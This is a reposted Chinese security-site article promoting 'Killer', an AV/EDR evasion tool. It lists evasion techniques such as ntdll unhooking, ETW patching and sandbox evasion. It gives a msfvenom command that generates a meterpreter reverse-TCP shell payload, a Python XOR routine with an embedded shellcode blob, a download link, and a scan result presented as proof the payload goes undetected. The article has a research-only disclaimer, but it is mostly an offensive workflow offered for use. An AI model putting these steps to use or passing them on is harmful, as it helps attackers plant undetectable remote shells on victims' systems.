Killer!逃避AV和EDR的免杀工具

admin
admin
admin
140350
文章
117
评论
2024年1月21日14:50:14评论59 views字数 1670阅读5分34秒阅读模式

工具介绍

它是一个 AV/EDR 规避工具,旨在绕过安全工具进行学习,到目前为止,该工具还很 FUD。

工具特点

用于逃避内存扫描的模块踩踏通过新的 ntdll 副本取消 DLLIAT 隐藏和混淆以及 API 脱钩ETW Patchnig 用于绕过某些安全控制包括沙箱规避技术和基本反调试通过 XOR 完全混淆(函数 - 键 - Shellcode)Shellcode 反转并加密在不使用 API 的情况下将有效负载移动到神圣的内存中GetProcAddress 和 GetModuleHandle 由 @cocomelonc 实现无需创建新线程即可运行并支持 x64 和 x86 架构
工具使用

使用 msfvenom 工具生成 shellcode

  msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST<IP> LPORT<PORT> -f py
然后将输出复制到加密器 XOR 函数中:
    data = b"xfcxe8x82x00x00x00x60x89xe5x31xc0x64x8bx50x30x8bx52x0cx8bx52x14x8bx72x28x0fxb7x4ax26x31xffxacx3cx61x7cx02x2cx20xc1xcfx0dx01xc7xe2xf2x52x57x8bx52x10x8bx4ax3cx8bx4cx11x78xe3x48x01xd1x51x8bx59x20x01xd3x8bx49x18xe3x3ax49x8bx34x8bx01xd6x31xffxacxc1xcfx0dx01xc7x38xe0x75xf6x03x7dxf8x3bx7dx24x75xe4x58x8bx58x24x01xd3x66x8bx0cx4bx8bx58x1cx01xd3x8bx04x8bx01xd0x89x44x24x24x5bx5bx61x59x5ax51xffxe0x5fx5fx5ax8bx12xebx8dx5dx6ax01x8dx85xb2x00x00x00x50x68x31x8bx6fx87xffxd5xbbxf0xb5xa2x56x68xa6x95xbdx9dxffxd5x3cx06x7cx0ax80xfbxe0x75x05xbbx47x13x72x6fx6ax00x53xffxd5x63x61x6cx63x2ex65x78x65x00"    key  = 0x50 # Put here your key as byte like for example (0x90 or 0x40 or 0x30) and more...    print('{ ', end='')    for i in data:        print(hex(i ^ key), end=', ')    print("0x0 };") # Notice that it adds one byte "0x0" to the end.
然后你就可以处理你的解密函数了,这对于脚本小子来说并不容易^-^,你可以在我的文章中阅读更多相关内容:
1部分 => https://medium.com/@0xHossam/av-edr-evasion-malware-development-933e50f47af52部分 => https://medium.com/@0xHossam/av-edr-evasion-malware-development-p2-7a947f7db3543部分 => https://medium.com/@0xHossam/unhooking-memory-object-hiding-3229b75618f74部分 => https://medium.com/@0xHossam/av-edr-evasion-malware-development-p-4-162662bb630ee
这是运行时的结果:
Killer!逃避AV和EDR的免杀工具

PoC(概念验证):

https://antiscan.me/images/result/07OkIKKhpRsG.png
Killer!逃避AV和EDR的免杀工具

下载地址

https://github.com/0xHossam/Killer

原文始发于微信公众号(Hack分享吧):Killer!逃避AV和EDR的免杀工具

 

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年1月21日14:50:14
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Killer!逃避AV和EDR的免杀工具https://cn-sec.com/archives/2415407.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息